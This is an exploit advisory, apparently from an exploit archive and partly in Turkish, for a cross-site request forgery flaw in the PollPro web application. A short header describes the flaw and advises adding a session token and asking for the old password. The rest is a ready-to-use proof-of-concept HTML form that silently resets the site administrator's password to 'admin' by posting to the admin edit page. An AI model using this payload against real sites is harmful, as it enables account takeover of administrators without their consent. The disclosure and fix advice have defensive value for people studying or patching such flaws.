< ------------------- header data start ------------------- > ############################################################# # Application Name : PollPro # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form&#8217;a Oturum Key&#8217;i (Session Token) eklenmeli, eski &#351;ifre sorulmal&#305;d&#305;r. # author : The_0nur-n0x ############################################################# < ------------------- header data end of ------------------- > <tr> <th0x> <td> <br /> <form action="http://Site.net/PATH/admin/agent_edit.asp?ID=USERID" name="frm" method="post" onSubmit="return Th30nur()"> <table cellpadding="2" cellspacing="0" border="0" align="center"><tr> <td>Username:</td> <td><input style="width: 400px;" type="Text" disabled="disabled" name="username" value="admin" size="45" maxlength="25" class="textbox" /></td> </tr><tr> <td>Password:</td> <td><input style="width: 400px;" type="Password" name="password" size="45" value="admin" maxlength="25" class="textbox" /></td> </tr><tr> <td>Name:</td> <td><input style="width: 400px;" type="Text" name="name" size="45" value="Admin User" maxlength="80" class="textbox" /></td> </tr><tr> <td>Enabled:</td> <td><input type="Checkbox" name="enable" checked value="1" /></td> </tr><tr> <td colspan="2" align="right"><br /><input type="Submit" value="Update" /></td> </tr></table> <input type="Hidden" name="mode" value="edit" /> </form> <br /> </td> </tr></table></th0x>